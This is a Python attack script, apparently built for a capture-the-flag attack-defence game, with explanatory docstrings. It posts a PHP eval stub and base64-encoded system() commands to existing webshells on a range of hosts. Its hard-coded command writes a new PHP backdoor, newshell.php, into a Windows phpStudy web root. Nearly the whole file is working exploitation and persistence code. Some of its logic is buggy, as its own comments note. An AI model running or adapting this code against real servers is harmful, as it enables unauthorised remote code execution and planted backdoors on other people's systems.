import requests,base64,re
def get_flag(url, flag_url, method, passwd, flag_path):
    """Send one request to a PHP page at ``http://<url>/<flag_path>`` and report the result.

    In ``'post'`` mode the form body has two fields: one named by ``passwd``
    holding the literal ``@eval(base64_decode($_POST[z0]));`` and one named
    ``z0`` holding a base64-encoded PHP ``system(...)`` call. In ``'get'``
    mode only a plain GET is issued and the form body is never sent.

    Defender note: the POST shape above (a PHP eval stub in one field, a
    base64 blob in ``z0``) is a fixed, signature-friendly pattern, and the
    traffic is plain ``http://``, so it is visible to network inspection.

    Args:
        url: Host part of the target (no scheme).
        flag_url: Only used in an assignment that is overwritten on the next
            line, so it has no effect on the request.
        method: ``'get'`` or ``'post'``; any other value leaves ``res``
            unbound and the status check below raises.
        passwd: Name of the POST field that carries the eval stub.
        flag_path: Path appended to the host.

    Returns:
        0 when the request raised or the status code is not 200; None when
        the status code is 200.
    """
    target = "http://" + url + "/" + flag_path

    # Dead store: replaced by the hard-coded command on the next line.
    cmd = "curl" + flag_url
    # Hard-coded command string; the caret escapes and the C:// path suggest a
    # Windows host running phpStudy — TODO confirm against the intended lab.
    cmd = 'echo ^<^?php ^@eval(^$^_POST[\'aaa\'])^;^?^> > C://phpStudy//PHPTutorial//WWW//css//123//newshell.php'
    get_cmd = "echo system(\"%s\");" % cmd

    data = {
        passwd: "@eval(base64_decode($_POST[z0]));",
        'z0': base64.b64encode(bytes(get_cmd, encoding='utf-8')),
    }

    # NOTE(review): both handlers are bare `except:` clauses, so every error
    # raised inside the try body is reported as "connection_timeout"; that
    # message is not reliable evidence of a network timeout.
    if method == 'get':
        try:
            res = get_re(target)
            print(res.content)
        except:
            print("[-] %s connection_timeout" % target)
            return 0
    elif method == 'post':
        try:
            res = post_re(target, data)
            hits = re.findall("\n\n", res.content)
            if hits:
                # Appends to flag.txt in the current working directory.
                with open('flag.txt', 'a+') as out:
                    out.write(hits)
            print(res.content)
        except:
            print("[-]%s connection_timeout" % target)
            return 0

    if res.status_code == 200:
        print("[+] %s webshell is Found" % target)
        return None

    print("[-] %s webshell Not Found" % target)
    return 0


def get_re(url):
    """Issue a GET to ``url`` with a 5-second timeout and return the response."""
    return requests.get(url=url, timeout=5)


def post_re(url, data):
    """POST ``data`` as a form body to ``url`` with a 5-second timeout and return the response."""
    return requests.post(url=url, data=data, timeout=5)
# Interactive driver: reads the five get_flag() arguments from stdin, then
# calls get_flag() once per host suffix 117, 118 and 119.
url = input("input your url:")
flag_url = input("input your flag_url:")
method = input("input your method:")
passwd = input("input your passwd:")
flag_path = input("input your flag_path:")

# Only the first iteration uses the prefix typed at the prompt. `url` is then
# reset to the hard-coded "10.0.0." prefix (assuming the reset sits inside the
# loop body, as the collapsed source suggests), so the remaining iterations
# address 10.0.0.118 and 10.0.0.119, which are RFC 1918 private addresses.
for host_suffix in map(str, range(117, 120)):
    get_flag(url + host_suffix, flag_url, method, passwd, flag_path)
    url = "10.0.0."